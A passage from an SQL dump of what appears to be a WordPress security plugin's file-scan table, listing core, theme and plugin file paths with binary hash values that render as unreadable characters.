���S���Տ&�!��','',0,'?'),('\0\\s�TÐ��֘8��','wp-includes/blocks/post-excerpt/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vӶ=dR\"<�k���U�','���%�#\0e��V�m�-�/�X�@�SW�z�?�','',0,'?'),('\0_�]��wgGS�K��','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ContainerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~rD�5�y�E��:','��蛮����!Z|��L���x<A6�&��','',0,'?'),('\0`Y�ϭrG����','wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"��~\'���$|2*�','�>�3� vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('\0a\0=꼏뺏��{�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/el.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\' V���\"��@}�','�THsZߦa+�_2Q8S^\n��y���o��f','',0,'?'),('\0kd̑DE/�n+�`�L','wp-content/plugins/wordpress-seo/languages/wordpress-seo-es_VE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�R!a\\m����','4� �\ZU-����+rr��\\����1C���','',0,'?'),('\0mA}=��I#���o�','wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�B�9����Ǭ�','Γ�&[��f��&�\'��8���I,�A��','',0,'?'),('\0o��y���z_��p�D�','wp-content/themes/vega/sample/images/recent-news-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��6J)+��)\'d�','^�p�Me�{�\Z�⢩�Q}+A��qG��o���','',0,'?'),('\0��2��� �Ky�v�','wp-content/plugins/wordpress-seo/lib/dependency-injection/container-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[Q�v^�f���¾','�Yj���x���J��oq��!��bNgk�Y@�','',0,'?'),('\0���;f��Q�=*Ǖ�','wp-includes/js/wp-emoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('\0��%ΥJ-�p��','wp-content/plugins/wordpress-seo/inc/class-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5Hv��Q�/4�f�2p0','��Qbݢαy<2������DO�\Z�,��+','',0,'?'),('\0��n�>O\"-���','wp-content/languages/admin-network-en_GB.po',0,'�\0�xC!A����ת/�','�\0�xC!A����ת/�','n�,�dڔ䩅.j�z�Ev��d��vT�P�','',0,'?'),('\0�9�k5&�ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�kݢA��D�5z�yj','BQ�e!�R�il��s�nq��R41x�x�Q!','',0,'?'),('\0�G���As�7.��.�V','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T�����}2�','�̖�^)�VX����|���p�OS]��~h�','',0,'?'),('\0�|9��u�e���@��','wp-admin/includes/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�bb})*9�>','�G�d�2���P# �Hؖx���i�tψ�','',0,'?'),('\0�D�`�8R��ɲ%��','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}��`i���y��','���Tܯ����19^�ջ�P\'�L�d%�k|�P؞','',0,'?'),('\0��P���KM,�9M','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-opengraph-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޘ&W 9,�|Lz��!','~ˌ��A U0H�g�q\Z˖��xFpl!��','',0,'?'),('\0�lDd��u^��Y��','wp-admin/user/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�I���U{x1�A','F��u�X\0�og�:~��h��_��5��p�t�$','',0,'?'),('\0�����6�uY���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','հ;�����6�u�','f�?���(��m�������Zn�ҳ���h;ފ','',0,'?'),('\0ꮂqs���x��h','wp-content/plugins/wordpress-seo/src/deprecated/admin/extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��~؏�x�Tn','�K�@N:�����l�T����&�ݼ��Ce�','',0,'?'),('\0�v����ئ���ݞ','wp-includes/blocks/post-template/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y\\G�-rP�+�\Z�B��','�75~��lIZ[\\�G1��\n�|u?fU�EK!','',0,'?'),('\0� $���ә\0֫','wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y���8[֫��\'����','<ۚ�B^��c��xU�NL�xc�#\\�c��','',0,'?'),('\rx+�U��ڜ���','wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���6JҨNM!d��$t','E��|���K4�g�,��_��^��,�� Ev�','',0,'?'),('/>����(��3�','wp-includes/blocks/verse/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y����Vq�Y�\n�','MbO<W\'8!����A��S�\r�G_n0���s�','',0,'?'),('A�wF�K�s�|�B5�','wp-content/themes/vega/parts/banner-custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٘[�mq����','��Yb>�L�:|���qOl�8�IV�k���r:!�','',0,'?'),('K�՚J[�W��0F�','wp-content/plugins/wordpress-seo/languages/yoast-components-ar.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�����t���t●��','D����v|���[#s��s�ӱk��}s��','',0,'?'),('NQ�\"*hz�r�w|\Z�','wp-admin/images/media-button-other.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q&T^�]BB�g\'��','��B\Z�r�F�В���Pv-^fT�,�_��i','',0,'?'),('T�\r�4�}�^a@|O','wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+a>���]���','���J��2~ݖi�u�{����\\�N]����','',0,'?'),('X�ɘy_�7�XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\h����\'\n䷺',' �7��RG�$/����-i��Nm(�W�;̅','',0,'?'),(']��j��R���X','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��//R�����j���.','��3\'�X\r�o�`/��D����/�3\Z','',0,'?'),('z����T�i�:A���','wp-content/plugins/wordpress-seo/languages/wordpress-seo-pt_AO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y(��N�m��y','ݔQb7u���\Z+�Ee��W\0۪��<Z��A','',0,'?'),('}K&�(t�-0W�Of�e','wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�m!U߄���U','wp-content/plugins/wp-cerber/assets/flags/bz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�����ڜ�','�0^k R�e�����q��C���G���Q\"��','',0,'?'),('�T�h���zP��r�','wp-admin/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\Z5O�a46���>f�Z','�Z2��6Q�����뎬6��0�w5��J�{�','',0,'?'),('�ϋД\'Ot�ʗM;','wp-includes/js/dist/deprecated.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[O��|�e��J�,^�','���KaJv h�t&��^#ğeT�<�9�@L?','',0,'?'),('�u�9���5�EzV9','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/GuzzleException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h]p����6����=','1�\r�\n�/�}sN�o�f��1�\"���y��o��','',0,'?'),('�X|_��wc�:�j��','wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�-��z��g��!k��','/�x-�i�.J��m�c9f%�\\ w�9H{','',0,'?'),('��E?tB9b��vF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('닭�N��{=��;_�','wp-content/plugins/wordpress-seo/admin/roles/class-abstract-role-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-\'\n�P�iw�?','���$-]�(nhzdDž3��pt���Xl�s�','',0,'?'),('�亐�n�E��M�Q','wp-content/plugins/wordpress-seo/css/dist/toggle-switch-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�f��,hs�gq>A','17U,\0֒b+��%��WR���5D���/m\'u','',0,'?'),('�Ͻ�F�ٷI=[��s','wp-content/plugins/wordpress-seo/admin/class-admin-recommended-replace-vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�_��9��eB�','\\DoC�Uޚ� }�qۃ�Sϛuh�2Im','',0,'?'),('��f�i7��&˗�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Q�ǎ���?�Bȿ ','<>��;�8�x���J��L��]#:��= M��m���','',0,'?'),('<\0$�М?��-8U\0','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C\r��;�)��E�PXt','��~�cUL^2u�������f��vlV�B','',0,'?'),('t]�ٟu��u��j�','wp-admin/images/menu-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���L�,_�;1/�E�','G�iH|��)��E;��\"_�;ԣ4Իw�ly�','',0,'?'),('��~�w`�5;F㮮','wp-includes/js/jquery/ui/effect-size.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�=��q�\rljA+','wp-admin/user/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<D\0�\n#���E����','X�x�no�{\0���\\��䞿��e[��jZN','',0,'?'),('\'�5�ur߲���m','wp-content/plugins/wp-cerber/cerber-whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���D�pM����Q�','t<e��F/�+�A�8�_�D\Z�����[��jg','',0,'?'),('*&5,qV0v�c','wp-includes/blocks/post-template/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:l$���^4�x`��','��%��WӸsK����{�:��T5�%6�]�D�u','',0,'?'),('<)8T*.�SuS�ĺ�','wp-includes/SimplePie/Cache/MySQL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�) ��fz���C�0�',' ��W��A��2Lh�`���i�%iv�2���','',0,'?'),('HC���!���\"(�','wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('J�\rӷG>�����','wp-includes/class-walker-page-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('V���F|j/� c','wp-content/plugins/wordpress-seo/lib/migrations/migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \0A\0j��]��;�bU','#��!�E1�hoiӪ�ǧ�����n�䣊B�mY','',0,'?'),('u��s��y6\'v,��=','wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����\"@rX���X','��m��j��$]���^�I��\'��G���[���','',0,'?'),('�\"�qUy���9�%Q�','wp-includes/class-wp-matchesmapregex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('�\"��.}}X��1�\Z�','wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���+�6�e�A�','�����K�j�ij�q�2�i���c^%ܓK�O?','',0,'?'),('� ����K i�D��t','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zz�#H��','n]��x�������\Z_Ѫk�B�-a�&�̃','',0,'?'),('ҩ\Z����q�����(','wp-content/plugins/wordpress-seo/src/config/badge-group-names.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�Yg��ryGO\0Ȳ','�^uR[�%���� {��ރRq�s\"��(','',0,'?'),('�V�I��0�p�&���','wp-content/plugins/wordpress-seo/admin/menu/class-submenu-capability-normalize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u� �|�$��=N','�L��O-~;��#�{uTF�Nue�3\"xw�K','',0,'?'),('����7�&��Ȁ','wp-includes/js/tinymce/skins/lightgray/content.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('��*(��*�+�Wj�cp','wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3Կ:�V� ��U\'','���|<���P*tg�3�dYs��/������','',0,'?'),('�5��0�}Z�~�)Ѩ','wp-content/uploads/2019/10/plumbing2-300x250.jpg',0,'�Z�{N����X��#','�Z�{N����X��#','�r�P$����g��U�ADP^\rK�������P','',0,'?'),('�85\\R��qo�-���=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����$x /�����','�<b��ob����nA���E���7_��GK','',0,'?'),('��0r�H\"�YK]T�','wp-admin/css/site-icon-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����L�DR��*�','Yin>j�#�K�N%8TP����O_���,','',0,'?'),('����ɮ\0�?i���u','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/interface-wpseo-graph-piece.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RW�U�x��N�չ�e','���\r�\0a9��ܐ��\Z�<�2�G)*.~','',0,'?'),('\0[��2�q|���','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seo-framework.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z�X��D�Ĵu','�+�N� =��B`PT_*�˥�G&��ܼ�懠�j','',0,'?'),('!�[�ذ��\n�g\'','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/RejectionException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p�.��a$����','�����sl0&��S8���;g\0�O)7XDž�k','',0,'?'),(' }��2S\Z�D¥�\r��','wp-content/uploads/2019/12/pexels-photo-2098443-350x220.jpeg',0,'�_o��!�+��ސ6�h','�_o��!�+��ސ6�h','(]�1Ko�� 6�ks���^�<!�p�� Y�5','',0,'?'),('(!(>^%���g�G�','wp-content/plugins/wordpress-seo/admin/notifiers/class-configuration-notifier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�|���#됉���ib','��we�ڑ:��l�og��Gʝ|��<R�*','',0,'?'),('(�9l1��5nq���','wp-includes/blocks/button/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c2R{DbYg�E�<[ ','4�8��e)oa���O8��fmy����E���','',0,'?'),('(���љ����\0H<_','wp-admin/includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�8|NK(�:2�j','\ni��{�J�~d���H��ّ��\n��yo�g�','',0,'?'),('-�c��U�H;Ԓ��','wp-content/plugins/redirection/locale/redirection-es_MX.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kbq�^�{�&Ŋ&','-�f�MX�,�@�$�M1!�-۸��_����W\\�','',0,'?'),('3x2�§��h�_','wp-includes/blocks/shortcode/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͻ�0E���<��#�','I�D�W�=�~7�����(���3E���b$@x`�','',0,'?'),('<.��4�v��c�\"`�t','wp-includes/class-wp-simplepie-sanitize-kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('A畃�c�;@���y�','wp-content/plugins/wordpress-seo/languages/yoast-seo-js.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8D��>-���c><�LS','�ځ�/�h�O�`I�\08|ob|�� N�Q','',0,'?'),('Ek�(u�!���QU^�','wp-content/plugins/wordpress-seo/src/conditionals/admin/licenses-page-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9l���3�;�=�L�','\Z��bT\n�LpTk��⑩v9ݸ�K��Ć6���L','',0,'?'),('i�PÙ��ld\0��','wp-includes/css/jquery-ui-dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('k�4c����5<\"','wp-includes/js/dist/autop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�ڭ�#rz�R�9�','��2���H*Im]2��t%[���^`?�kh]Z','',0,'?'),('})Z��#4�c��4�','wp-content/plugins/wp-cerber/assets/flags/au.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('�uAm����s�,)DEv','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/ContainerExceptionInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bf�y����y�','�Q���YpC�=�3�;�u����N���K���oՄ','',0,'?'),('��pCy�)� �{�','wp-content/themes/twentynineteen/sass/forms/_fields.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}6r ������_���','��H�� (��X���J�N5�\\<*m�\0\r�4��','',0,'?'),('��M5�kҀak��!!�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-sr_RS.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������d\0�e(�','���Ca[A�jZ��S���\';�7��R��M','',0,'?'),('�B�WWg�܈���','wp-content/uploads/2019/08/business-training-150x150.jpg',0,'��c�<_���\n','��c�<_���\n','sl�pA�8�\0�����:V��?@N*�ׂ�ܞGش','',0,'?'),('���).��p�\ZI&','wp-content/themes/vega/parts/frontpage-open1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�1z�2c5��W;r�W','��\Z5ɺ��ƞ���cag�g\n7Ч�9��','',0,'?'),('�x#��*W`P���D�','wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�&��:^��!��y�','����y�ӑ4UVȡF>/��m��#�<{�r�','',0,'?'),('��9���䷳\n���6�','wp-content/plugins/wordpress-seo/admin/pages/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�f�|�����{[6�','B>3�m�a.��G��K���K����&@�>9','',0,'?'),(']�\'ƫ���-�K','wp-content/plugins/wordpress-seo/js/dist/externals/styleGuide-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jU��v�5�{��V�','�GCD���Yn� \"����>����O��o��','',0,'?'),('!���@|�4��n���','wp-includes/class-http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�5���U�c��5�{Q','��v,�óiēm`�<�߲~\n\"���\r','',0,'?'),('\'ڞ\0;��?�+VҪ�','wp-admin/network/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=��#L�H���','q�/*߲3��x�S���~�.\']w��k�,W','',0,'?'),(',�u�;����aa3�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-pt_AO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pH�#��e��ٍ�T:�','�\"�!�y0����դq�>�c�߷ocR�4�','',0,'?'),(';pR9��+�qpծ','wp-admin/includes/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':s��B�\Z�?���l','6l.v>��\\��c�4շ=T��~l�F��n�','',0,'?'),('?��|꺯��~x����','wp-includes/blocks/query/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VY���8B���K�)�{','�j\'��ۉ�>MOB��UZ���h��fy\r�','',0,'?'),('B�{�)�s��\'','wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2O+z�p�㓗E�?��X','[�m_-�af�����\Z�\r�{)���<Q9P�7ͦ','',0,'?'),('P�\\��ԑ�Q���rgH','wp-content/uploads/2016/11/cropped-lost-places-300x94.jpg',0,'o�t�eB-�y�T�`','o�t�eB-�y�T�`','C���ջ~�_�<�ї`�C�I\"}:r>�f���5','',0,'?'),('R��jpa,���>o<','wp-content/languages/plugins/disable-gutenberg-en_GB.po',0,'Wy�,�3��n7��','Wy�,�3��n7��','�ⰷd�S�Z�X[��n�XT�\"�߈�X','',0,'?'),('Z9XƵ��������','wp-content/plugins/wordpress-seo/src/deprecated/frontend/abstract-class-deprecated-schema-piece.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���FE��a:�w�j�=�','��\0�Z\"�z\r�-�vJ8���G�̒�yb','',0,'?'),('_���\0.�6�l�q�','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('u\0�e&��$��O�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-abstract-plugin-importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�f��~�C����W','�S_>[�g�9�TЊ���VPRr��r^\\r\"�*','',0,'?'),('x��m���\0�~���','wp-includes/customize/class-wp-customize-nav-menus-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�K͞�u Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('yiú\n�_Tz\\���l','wp-content/plugins/wordpress-seo/src/helpers/asset-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ,Dxm��q,ě��','�Ŗ��!�n����)E�ǿS���b���/.','',0,'?'),('~)�zL�� T\0�','wp-content/plugins/redirection/matches/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�(�(!������','��GICuǶ�N!V�-��I�u��\Z���u�','',0,'?'),('�܈�y��7@����\"','wp-includes/blocks/audio/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�\n>o�`�����','3\r���gK|�P35�����E����=�k�','',0,'?'),('�l�g<���=�l�','wp-content/plugins/akismet/class.akismet-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�>��_�?~f-=u�','�$ʣ�}4�-q@k9-�Ѳ*x�ܱ\Z�~e','',0,'?'),('��k[҄.? F�R�p@','wp-content/plugins/wp-cerber/assets/flags/vc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C)���y$���%�E','���N�h��А!�o�:s1�o�~%�`�','',0,'?'),('���\n�#�T��?��','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2W�L��;m�06��','�Є�<�EHm`^�w�I����b�����M�','',0,'?'),('�V�9��<�*\r�̬D','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��6�]����*�Z�5','J]5.�q��QР� I��q��~s��Ό����','',0,'?'),('�Ú2��d�=','wp-includes/rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`%��F�S&s��L�','q0:c�{>���q|U,��p�\\Hޞ��h\\a�H','',0,'?'),('�P\0\'�0l���v�#J<','wp-includes/js/jquery/ui/effect-fold.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('Ȅ���xy����','wp-includes/js/tinymce/skins/wordpress/images/embedded.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('ϴ 3P`#8^��Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��HPUʭ�]gkZ�','%�\0Y�TQ�[�%� �T�\0����W�~��2�','',0,'?'),('�G�#�;\"L�%���','wp-includes/blocks/categories/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vt�)l�[:�����','�Y����i$>�8\nvM{�B��R��!���^','',0,'?'),('�\"�ob���|�oz��','wp-content/uploads/2019/12/pexels-photo-2098443-300x250.jpeg',0,'��_�a��Ry$Cl� 6','��_�a��Ry$Cl� 6','�ǬQG��1d���ȗ���\r\n��`��e�r','',0,'?'),('�t3�.��^\0���','wp-content/plugins/wordpress-seo/images/alert-error-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dyѵJ6�hh2=Yظx','�S6]+��u^L1n���<�7���/M�z��`�f','',0,'?'),('\0�,�#�heLG�(}','wp-includes/blocks/query-pagination-numbers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vw\n>�FB�{>��l�v','��Z���&�ϵ�܊�<,�Zϊ��[y�','',0,'?'),('G��1��i�t�n� �','wp-content/plugins/wordpress-seo/src/conditionals/migrations-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TG_��S��<&�^�','�܁�:¾����9$�7##���B��<�V','',0,'?'),('\"��N߬jj)��\0��N','wp-admin/images/menu-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jG����{�>�^;$��','�2]y��#h���2�9�> ^s�\rH� \n��g��','',0,'?'),('3���X�G%<!>','wp-includes/blocks/pullquote/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O)r���B\\���O��','��3B��>��t7~g� �8z�v��q�^g3�I>','',0,'?'),('9*I���Cc����','wp-includes/blocks/post-excerpt/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vӶ=dR\"<�k���U�','���%�#\0e��V�m�-�/�X�@�SW�z�?�','',0,'?'),('q���_\"�1�F','wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s`���pxMf{��\n�','�*0�ؤ���3B�j� q�29�\0 (�~','',0,'?'),('tZQ��Yz0����跫','wp-admin/images/wordpress-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ư�y��o�8��8S�`�','bx�L�PͰ��=^���a�m���1i��','',0,'?'),('�)���E��)�K�;','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/PostAuthOptionProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0w\Z�\"�TVej�l','W#�}�Z�~4��NU�������W�2����3','',0,'?'),('���\0��[�uS��G�','wp-content/plugins/wordpress-seo/admin/views/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@\\-���nۭ(v�S�','���݃=����Z�Y!�%[[SBh����X��','',0,'?'),('���k�5S�H���Ы','wp-includes/SimplePie/Author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('���e�bW�A0�d','wp-admin/images/comment-grey-bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�*\'����t���F','7 